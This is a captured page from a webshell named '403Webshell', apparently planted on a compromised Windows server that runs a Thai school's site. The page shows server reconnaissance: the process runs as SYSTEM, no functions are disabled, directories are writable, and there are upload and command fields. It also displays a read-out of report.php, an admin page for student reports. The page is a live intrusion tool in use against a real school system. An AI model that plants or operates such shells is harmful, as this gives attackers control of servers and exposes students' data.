403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/news/edu2018/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/news/edu2018/admin/report.php
 <?php
 $report = $_GET['report'];
 if ( $report=="allstu") {
	 $title="นักเรียนทั้งหมด";
	 $file="allstu.html";
 }else if($report=="livesc"){
	 $title="นักเรียนอยู่หอพักในโรงเรียน";
	 $file="livesc.html";	 
 }else if($report=="getout"){
	 $title="นักเรียนกลับบ้าน";
	 $file="getout.html";	 
 }else if($report=="behavior"){
	 $title="คะแนนความประพฤตินักเรียน";
	 $file="behavior.html";	 
 }
 ?>
 <section class="content-header">
      <h1>
        รายงาน
        <small>Version 2.0</small>
      </h1>
      <ol class="breadcrumb">
        <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li>
        <li class="active">Dashboard</li>
      </ol>
    </section> 	
  <section class="content">
           <div class="box">

            <div class="box-header">
              <h3 class="box-title"><?=$title;?> </h3>
            </div>
            <!-- /.box-header -->
            <div class="box-body">
<iframe src="../print/<?=$file;?>" width="100%" height="700" frameborder="0"></iframe>
            </div>
            <!-- /.box-body -->
          </div>			

   </section>

Youez - 2016 - github.com/yon3zu
LinuXploit